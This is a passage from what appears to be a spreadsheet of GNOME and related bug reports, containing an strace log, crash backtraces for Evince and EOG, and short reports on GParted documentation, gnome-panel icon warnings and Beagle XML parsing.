old_mmap(NULL 323104 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40c11000
mprotect(0x40c1d000 273952 PROT_NONE) = 0
old_mmap(0x40c1d000 12288 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xc000) = 0x40c1d000
old_mmap(0x40c20000 261664 PROT_READ|PROT_WRITE
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x40c20000
close(3)                                = 0
open(/usr/lib/libgsf-1.so.1 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\350Y\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=108616 ...}) = 0
old_mmap(NULL 107816 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40c60000
mprotect(0x40c79000 5416 PROT_NONE)   = 0
old_mmap(0x40c79000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x19000) = 0x40c79000
close(3)                                = 0
open(/usr/lib/libgobject-2.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0Xg\0\000... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=188692 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x40c7b000
old_mmap(NULL 191752 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40c7c000
mprotect(0x40ca9000 7432 PROT_NONE)   = 0
old_mmap(0x40ca9000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x2c000) = 0x40ca9000
close(3)                                = 0
open(/usr/lib/libxml2.so.2 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\304\340... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=890352 ...}) = 0
old_mmap(NULL 896868 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40cab000
mprotect(0x40d7a000 48996 PROT_NONE)  = 0
old_mmap(0x40d7a000 49152 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xce000) = 0x40d7a000
close(3)                                = 0
open(/lib/libz.so.1 O_RDONLY)        = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0L\30\0\000...
1024) = 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=51356 ...}) = 0
old_mmap(NULL 50320 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40d86000
mprotect(0x40d91000 5264 PROT_NONE)   = 0
old_mmap(0x40d91000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xb000) = 0x40d91000
close(3)                                = 0
open(/lib/libm.so.6 O_RDONLY)        = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\2605\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=131156 ...}) = 0
old_mmap(NULL 133712 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40d93000
mprotect(0x40db3000 2640 PROT_NONE)   = 0
old_mmap(0x40db3000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x1f000) = 0x40db3000
close(3)                                = 0
open(/usr/lib/libglib-2.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0X\275\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=402376 ...}) = 0
old_mmap(NULL 401348 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40db4000
mprotect(0x40e15000 4036 PROT_NONE)   = 0
old_mmap(0x40e15000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x61000) = 0x40e15000
close(3)                                = 0
open(/lib/libc.so.6 O_RDONLY)        = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\275Z\1... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0755 st_size=1104040 ...}) = 0
old_mmap(NULL 1113796 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40e16000
mprotect(0x40f1e000 32452 PROT_NONE)  = 0
old_mmap(0x40f1e000 24576 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x107000) = 0x40f1e000
old_mmap(0x40f24000 7876 PROT_READ|PROT_WRITE
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x40f24000
close(3)                                = 0
open(/usr/X11R6/lib/libexpat.so.1 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\240 \0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0755 st_size=128665 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x40f26000
old_mmap(NULL 113252 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40f27000
mprotect(0x40f41000 6756 PROT_NONE)   = 0
old_mmap(0x40f41000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x1a000) = 0x40f41000
close(3)                                = 0
open(/usr/X11R6/lib/libXi.so.6 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\23\0\000...
1024) = 1024
fstat64(3 {st_mode=S_IFREG|0755 st_size=35497 ...}) = 0
old_mmap(NULL 29856 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40f43000
mprotect(0x40f4a000 1184 PROT_NONE)   = 0
old_mmap(0x40f4a000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x6000) = 0x40f4a000
close(3)                                = 0
open(/usr/X11R6/lib/libXext.so.6 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340(\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0755 st_size=62208 ...}) = 0
old_mmap(NULL 52924 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40f4b000
mprotect(0x40f57000 3772 PROT_NONE)   = 0
old_mmap(0x40f57000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xb000) = 0x40f57000
close(3)                                = 0
open(/usr/X11R6/lib/libXft.so.2 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\2609\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0755 st_size=75392 ...}) = 0
old_mmap(NULL 65208 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40f58000
mprotect(0x40f67000 3768 PROT_NONE)   = 0
old_mmap(0x40f67000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xe000) = 0x40f67000
close(3)                                = 0
open(/usr/X11R6/lib/libXrender.so.1 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220\23... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0755 st_size=32475 ...}) = 0
old_mmap(NULL 25324 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40f68000
mprotect(0x40f6e000 748 PROT_NONE)    = 0
old_mmap(0x40f6e000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x6000) = 0x40f6e000
close(3)                                = 0
open(/usr/X11R6/lib/libX11.so.6 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220\21... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0755 st_size=865040 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x40f6f000
old_mmap(NULL 747256 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40f70000
mprotect(0x41024000 9976 PROT_NONE)   = 0
old_mmap(0x41024000 12288 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xb4000) = 0x41024000
close(3)                                = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x41027000
munmap(0x40012000 41629)               = 0
getrlimit(0x3 0xbffff694)              = 0
setrlimit(RLIMIT_STACK {rlim_cur=2044*1024 rlim_max=RLIM_INFINITY}) = 0
getpid()                                = 13661
rt_sigaction(SIGRTMIN {0x40c18c2a [] SA_RESTORER 0x40e3c9d8} NULL 8) = 0
rt_sigaction(SIGRT_1 {0x40c18c62 [] SA_RESTORER 0x40e3c9d8} NULL 8) = 0
rt_sigaction(SIGRT_2 {0x40c18d15 [] SA_RESTORER 0x40e3c9d8} NULL 8) = 0
rt_sigprocmask(SIG_BLOCK [RTMIN] NULL 8) = 0
_sysctl({{CTL_KERN KERN_VERSION} 2 0xbffff6bc 31 (nil) 0}) = 0
brk(0)                                  = 0x8257c98
brk(0x8258c98)                          = 0x8258c98
brk(0)                                  = 0x8258c98
brk(0x8259000)                          = 0x8259000
brk(0)                                  = 0x8259000
brk(0x825a000)                          = 0x825a000
brk(0)                                  = 0x825a000
brk(0x825b000)                          = 0x825b000
brk(0)                                  = 0x825b000
brk(0x825c000)                          = 0x825c000
brk(0)                                  = 0x825c000
brk(0x825d000)                          = 0x825d000
brk(0)                                  = 0x825d000
brk(0x825e000)                          = 0x825e000
geteuid32()                             = 1000
getuid32()                              = 1000
getegid32()                             = 1000
getgid32()                              = 1000
brk(0)                                  = 0x825e000
brk(0x825f000)                          = 0x825f000
sched_getscheduler(0x355d)              = 0
sched_getparam(0x355d 0xbffff860)      = 0
sched_get_priority_min(0)               = 0
sched_get_priority_max(0)               = 0
sched_get_priority_max(0)               = 0
getpid()                                = 13661
getpid()                                = 13661
getpriority(PRIO_PROCESS 13661)        = 20
brk(0)                                  = 0x825f000
brk(0x8260000)                          = 0x8260000
brk(0)                                  = 0x8260000
brk(0x8261000)                          = 0x8261000
getpid()                                = 13661
getuid32()                              = 1000
socket(PF_UNIX SOCK_STREAM 0)         = 3
connect(3 {sa_family=AF_UNIX path=/var/run/.nscd_socket} 110) = -1
ENOENT (No such file or directory)
close(3)                                = 0
open(/etc/nsswitch.conf O_RDONLY)    = 3
fstat64(3 {st_mode=S_IFREG|0644 st_size=465 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x40012000
read(3 # /etc/nsswitch.conf\n#\n# Example... 4096) = 465
read(3  4096)                       = 0
close(3)                                = 0
munmap(0x40012000 4096)                = 0
open(/etc/ld.so.cache O_RDONLY)      = 3
fstat64(3 {st_mode=S_IFREG|0644 st_size=41629 ...}) = 0
old_mmap(NULL 41629 PROT_READ MAP_PRIVATE 3 0) = 0x40012000
close(3)                                = 0
open(/lib/libnss_compat.so.2 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\214\25... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=38892 ...}) = 0
old_mmap(NULL 37836 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x41028000
mprotect(0x41031000 972 PROT_NONE)    = 0
old_mmap(0x41031000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x9000) = 0x41031000
close(3)                                = 0
munmap(0x40012000 41629)               = 0
uname({sys=Linux node=singularity ...}) = 0
open(/etc/passwd O_RDONLY)           = 3
fcntl64(3 F_GETFD)                     = 0
fcntl64(3 F_SETFD FD_CLOEXEC)         = 0
fstat64(3 {st_mode=S_IFREG|0644 st_size=960 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x40012000
_llseek(3 0 [0] SEEK_CUR)            = 0
read(3 root:x:0:0:root:/root:/bin/bash\n... 4096) = 960
uname({sys=Linux node=singularity ...}) = 0
brk(0)                                  = 0x8261000
brk(0x8262000)                          = 0x8262000
open(/var/yp/binding/fierypit.net.2 O_RDONLY) = 4
readv(4 [{\377\377 2} {\1\0\0\0\300\250\1\1\2\320\0\0 12}] 2) = 14
brk(0)                                  = 0x8262000
brk(0x8266000)                          = 0x8266000
gettimeofday({1048507221 100044} NULL) = 0
socket(PF_INET SOCK_DGRAM IPPROTO_UDP) = 5
getpid()                                = 13661
bind(5 {sa_family=AF_INET sin_port=htons(693)
sin_addr=inet_addr(0.0.0.0)} 16) = -1 EACCES (Permission denied)
ioctl(5 FIONBIO [1])                  = 0
setsockopt(5 SOL_IP IP_RECVERR [1] 4) = 0
fcntl64(5 F_SETFD FD_CLOEXEC)         = 0
close(4)                                = 0
sendto(5 2Y\365\200\0\0\0\0\0\0\0\2\0\1\206\244\0\0\0\2\0\0\0\3... 80
0 {sa_family=AF_INET sin_port=htons(720)
sin_addr=inet_addr(192.168.1.1)} 16) = 80
poll([{fd=5 events=POLLIN revents=POLLIN}] 1 5000) = 1
recvfrom(5 2Y\365\200\0\0\0\1\0\0\0</t>
  </si>
  <si>
    <t>glortzp</t>
  </si>
  <si>
    <t>GPARTED-529625</t>
  </si>
  <si>
    <t>INSTALL NOTES section in the 'README' can be simplified</t>
  </si>
  <si>
    <t>Documentation 
Section: 
I believe many (probably most) linux distros ships gparted in one form (repo) or the other. It will be a lot much nicer to engage the packagers of gparted in the distros in properly packaging it and putting out recent versions out on time rather than encouraging users to compile their own binaries. The process of compiling from source often creates a mess and confusion for new users when they could have easily install available binaries built for their distros.
PS: On my part I hope to make gparted-0.3.6 available for Fedora as soon as Fedora 9 is released (if no newer version is released by then). 
Correct version:
Other information:</t>
  </si>
  <si>
    <t>dakingun</t>
  </si>
  <si>
    <t>EVINCE-361683</t>
  </si>
  <si>
    <t>assertion on uniform_width while reading djvu index file</t>
  </si>
  <si>
    <t>Version: 0.6.1
What were you doing when the application crashed?
reading http://www.seagrant.wisc.edu/greatlakesfish/becker/directory.djvu?djvuopts&amp;page=1058
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 58576896 vsize: 0 resident: 58576896 share: 0 rss: 16183296 rss_rlim: 0
CPU usage: start_time: 1160654433 rtime: 0 utime: 181 stime: 0 cutime:173 cstime: 0 timeout: 8 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/evince'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1229928784 (LWP 13258)]
[New Thread -1231254624 (LWP 13260)]
(no debugging symbols found)
0xb7f1e410 in __kernel_vsyscall ()
#0  0xb7f1e410 in __kernel_vsyscall ()
#1  0xb71ab34b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7ed91b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0xb7f1e410 in __kernel_vsyscall ()
#5  0xb7094770 in raise () from /lib/tls/i686/cmov/libc.so.6
#6  0xb7095ef3 in abort () from /lib/tls/i686/cmov/libc.so.6
#7  0xb7424122 in g_logv () from /usr/lib/libglib-2.0.so.0
#8  0xb7424159 in g_log () from /usr/lib/libglib-2.0.so.0
#9  0xb74241d6 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
#10 0x08062d95 in ?? ()
#11 0x00000000 in ?? ()
Thread 2 (Thread -1231254624 (LWP 13260)):
#0  0xb7f1e410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71a7816 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0x0805dde3 in ?? ()
No symbol table info available.
#3  0x08115f18 in ?? ()
No symbol table info available.
#4  0x0811fee0 in ?? ()
No symbol table info available.
#5  0xb71a6cd9 in pthread_mutex_unlock ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#6  0xb743938f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0xb71a4504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#8  0xb713851e in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1229928784 (LWP 13258)):
#0  0xb7f1e410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71ab34b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7ed91b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xb7f1e410 in __kernel_vsyscall ()
No symbol table info available.
#5  0xb7094770 in raise () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#6  0xb7095ef3 in abort () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#7  0xb7424122 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0xb7424159 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0xb74241d6 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x08062d95 in ?? ()
No symbol table info available.
#11 0x00000000 in ?? ()
No symbol table info available.
#0  0xb7f1e410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>bboissin+gnomebug</t>
  </si>
  <si>
    <t>GNOME-PANEL-167652</t>
  </si>
  <si>
    <t>Missing icon warning pop-ups for shortcuts in gnome-panel drawers</t>
  </si>
  <si>
    <t>This bug has been opened here: https://bugzilla.ubuntu.com/6452
When I open a drawer on my gnome-panel I get warning pop-ups (stacked) for
each icon for the shotcuts in in the drawer that the shortcut's icon is missing
e.g.:
   Failed to load image bug-buddy.png
   Details: Icon not found
The icons are shown however.  If I open the properties for the shortcut the
icon is shown and everything looks OK.
The warning pop-ups are only shown the first time I click on the drawer.  The
second and following times I open the drawer everything works normally.
Hoary gnome-panel version 2.9.91-0ubuntu2
It prints these messages:
(gnome-panel:2900): Gtk-CRITICAL **: gtk_icon_theme_lookup_icon: assertion
`GTK_IS_ICON_THEME (icon_theme)' failed
(gnome-panel:2900): Gtk-CRITICAL **: gtk_icon_theme_load_icon: assertion
`GTK_IS_ICON_THEME (icon_theme)' failed</t>
  </si>
  <si>
    <t>BEAGLE-167896</t>
  </si>
  <si>
    <t>Use XmlTextReader for basic XML parsing in FilteredIndexable.cs</t>
  </si>
  <si>
    <t>This removes a murder invitation and some evil code</t>
  </si>
  <si>
    <t>EOG-97369</t>
  </si>
  <si>
    <t>EOG crashes when opening second image</t>
  </si>
  <si>
    <t xml:space="preserve">Package: EOG
Severity: critical
Version: 1.1.0
Synopsis: EOG crashes when opening second image
Bugzilla-Product: EOG
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.0.5)
Description:
Description of Problem:
EOG crashed when opening a second file
Steps to reproduce the problem:
1. Start EOG
2. Load a PNG file via File-&gt;Open
3. Load a second PNG file via File-&gt;Open
Actual Results:
EOG Crashed with the provided backtrace after dismissing the file
selector.
Expected Results:
EOG opens the second file.
How often does this happen?
100% reproducible.
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/eog'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ew Thread 16384 (LWP 18030)]
(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0x40c322e9 in wait4 () from /lib/libc.so.6
#0  0x40c322e9 in wait4 () from /lib/libc.so.6
#1  0x40ca4704 in sys_sigabbrev () from /lib/libc.so.6
#2  0x406a1c84 in waitpid () from /lib/libpthread.so.0
#3  0x404a7723 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#4  0x406a35cb in __pthread_sighandler () from /lib/libpthread.so.0
#5  0x40bbdb88 in sigaction () from /lib/libc.so.6
#6  0x4052c7be in bonobo_ui_node_get_attr_by_id ()
   from /usr/lib/libbonoboui-2.so.0
#7  0x4053b67f in bonobo_ui_xml_make_path () from
/usr/lib/libbonoboui-2.so.0
#8  0x40529bd6 in bonobo_ui_engine_get_view () from
/usr/lib/libbonoboui-2.so.0
#9  0x40529cd2 in bonobo_ui_engine_get_view () from
/usr/lib/libbonoboui-2.so.0
#10 0x40529d49 in bonobo_ui_engine_get_view () from
/usr/lib/libbonoboui-2.so.0
#11 0x40529dc9 in bonobo_ui_engine_update_node ()
   from /usr/lib/libbonoboui-2.so.0
#12 0x4052a13c in bonobo_ui_engine_update () from
/usr/lib/libbonoboui-2.so.0
#13 0x405281ed in bonobo_ui_engine_xml_merge_tree ()
   from /usr/lib/libbonoboui-2.so.0
#14 0x40525c4d in bonobo_ui_config_widget_new ()
   from /usr/lib/libbonoboui-2.so.0
#15 0x405c268a in _ORBIT_skel_small_Bonobo_UIContainer_setNode ()
   from /usr/lib/libbonobo-2.so.0
#16 0x40670542 in ORBit_POA_setup_root () from /usr/lib/libORBit-2.so.0
#17 0x40673465 in ORBit_OAObject_invoke () from
/usr/lib/libORBit-2.so.0
#18 0x4066474d in ORBit_small_invoke_adaptor () from
/usr/lib/libORBit-2.so.0
#19 0x406709d4 in ORBit_recv_buffer_return_sys_exception ()
   from /usr/lib/libORBit-2.so.0
#20 0x40670c11 in ORBit_recv_buffer_return_sys_exception ()
   from /usr/lib/libORBit-2.so.0
#21 0x4067339e in ORBit_handle_request () from /usr/lib/libORBit-2.so.0
#22 0x406607de in giop_connection_handle_input () from
/usr/lib/libORBit-2.so.0
#23 0x4068d639 in linc_connection_set_max_buffer () from
/usr/lib/liblinc.so.1
#24 0x4068f178 in linc_server_get_type () from /usr/lib/liblinc.so.1
#25 0x40b52a19 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#26 0x40b53837 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#27 0x40b53c13 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#28 0x40b53d96 in g_main_context_iteration () from
/usr/lib/libglib-2.0.so.0
#29 0x4068c5d6 in linc_main_iteration () from /usr/lib/liblinc.so.1
#30 0x4065fc89 in giop_recv_buffer_get () from /usr/lib/libORBit-2.so.0
#31 0x40663d6b in ORBit_small_freekids () from /usr/lib/libORBit-2.so.0
#32 0x406642c0 in ORBit_small_invoke_stub () from
/usr/lib/libORBit-2.so.0
#33 0x406641c3 in ORBit_small_invoke_stub_n () from
/usr/lib/libORBit-2.so.0
#34 0x406411b2 in Bonobo_Unknown_unref ()
   from /usr/lib/libbonobo-activation.so.4
#35 0x405ad7f0 in bonobo_object_release_unref () from
/usr/lib/libbonobo-2.so.0
#36 0x0804d772 in adapt_shell_size_to_control ()
#37 0x0804d8ff in adapt_shell_size_to_control ()
#38 0x0804da2b in eog_window_open ()
#39 0x0804d03f in eog_window_open_dialog ()
#40 0x0804bfe2 in _start ()
#41 0x40522c25 in bonobo_socket_add_id () from
/usr/lib/libbonoboui-2.so.0
#42 0x40afce2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#43 0x405b767b in bonobo_closure_invoke_va_list ()
   from /usr/lib/libbonobo-2.so.0
#44 0x405b7891 in bonobo_closure_invoke () from
/usr/lib/libbonobo-2.so.0
#45 0x40522aa1 in bonobo_socket_add_id () from
/usr/lib/libbonoboui-2.so.0
#46 0x405bae83 in Bonobo_UIComponent_execVerb () from
/usr/lib/libbonobo-2.so.0
#47 0x405285ab in bonobo_ui_engine_get_ui_container ()
   from /usr/lib/libbonoboui-2.so.0
#48 0x40528761 in bonobo_ui_engine_get_ui_container ()
   from /usr/lib/libbonoboui-2.so.0
#49 0x40b120f2 in g_cclosure_marshal_VOID__POINTER ()
   from /usr/lib/libgobject-2.0.so.0
#50 0x40afd205 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#51 0x40afce2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#52 0x40b10d8a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#53 0x40b0f20a in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#54 0x40b0f4b5 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#55 0x4052a85f in bonobo_ui_engine_emit_verb_on_w ()
   from /usr/lib/libbonoboui-2.so.0
#56 0x4052f1bc in bonobo_ui_sync_menu_add_popup ()
   from /usr/lib/libbonoboui-2.so.0
#57 0x40b11796 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#58 0x40afce2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#59 0x40b10993 in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#60 0x40b0f20a in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#61 0x40832cdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#62 0x408b2efc in gtk_widget_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#63 0x408092da in gtk_menu_shell_activate_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
#64 0x4080879b in _gtk_menu_shell_activate () from
/usr/lib/libgtk-x11-2.0.so.0
#65 0x407fda62 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#66 0x40afd205 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#67 0x40afce2b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#68 0x40b10d8a in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
#69 0x40b0f277 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#70 0x40832cdf in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#71 0x408b2e2d in gtk_widget_send_expose () from
/usr/lib/libgtk-x11-2.0.so.0
#72 0x408b2a90 in gtk_widget_event () from /usr/lib/libgtk-x11-2.0.so.0
#73 0x407fd913 in gtk_propagate_event () from
/usr/lib/libgtk-x11-2.0.so.0
#74 0x407fc91e in gtk_main_do_event () from
/usr/lib/libgtk-x11-2.0.so.0
#75 0x40a2904c in _gdk_events_queue () from
/usr/lib/libgdk-x11-2.0.so.0
#76 0x40b52a19 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#77 0x40b53837 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#78 0x40b53c13 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#79 0x40b542ef in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#80 0x405a96df in bonobo_main () from /usr/lib/libbonobo-2.so.0
#81 0x0804eb6b in main ()
#82 0x40bac9d3 in __libc_start_main () from /lib/libc.so.6
Thread 1 (Thread 16384 (LWP 18030)):
#0  0x40c322e9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40ca4704 in sys_sigabbrev () from /lib/libc.so.6
No symbol table info available.
#2  0x406a1c84 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x404a7723 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x406a35cb in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x40bbdb88 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x4052c7be in bonobo_ui_node_get_attr_by_id ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#7  0x4053b67f in bonobo_ui_xml_make_path () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#8  0x40529bd6 in bonobo_ui_engine_get_view () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#9  0x40529cd2 in bonobo_ui_engine_get_view () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#10 0x40529d49 in bonobo_ui_engine_get_view () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#11 0x40529dc9 in bonobo_ui_engine_update_node ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#12 0x4052a13c in bonobo_ui_engine_update () from
/usr/lib/libbonoboui-2.so.0
No symbol table info available.
#13 0x405281ed in bonobo_ui_engine_xml_merge_tree ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#14 0x40525c4d in bonobo_ui_config_widget_new ()
   from /usr/lib/libbonoboui-2.so.0
No symbol table info available.
#15 0x405c268a in _ORBIT_skel_small_Bonobo_UIContainer_setNode ()
   from /usr/lib/libbonobo-2.so.0
No symbol table info available.
#16 0x40670542 in ORBit_POA_setup_root () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#17 0x40673465 in ORBit_OAObject_invoke () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#18 0x4066474d in ORBit_small_invoke_adaptor () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#19 0x406709d4 in ORBit_recv_buffer_return_sys_exception ()
   from /usr/lib/libORBit-2.so.0
No symbol table info available.
#20 0x40670c11 in ORBit_recv_buffer_return_sys_exception ()
   from /usr/lib/libORBit-2.so.0
No symbol table info available.
#21 0x4067339e in ORBit_handle_request () from /usr/lib/libORBit-2.so.0
No symbol table info available.
#22 0x406607de in giop_connection_handle_input () from
/usr/lib/libORBit-2.so.0
No symbol table info available.
#23 0x4068d639 in linc_connection_set_max_buffer () from
/usr/lib/liblinc.so.1
No symbol table info available.
#24 0x4068f178 in linc_server_get_type () from /usr/lib/liblinc.so.1
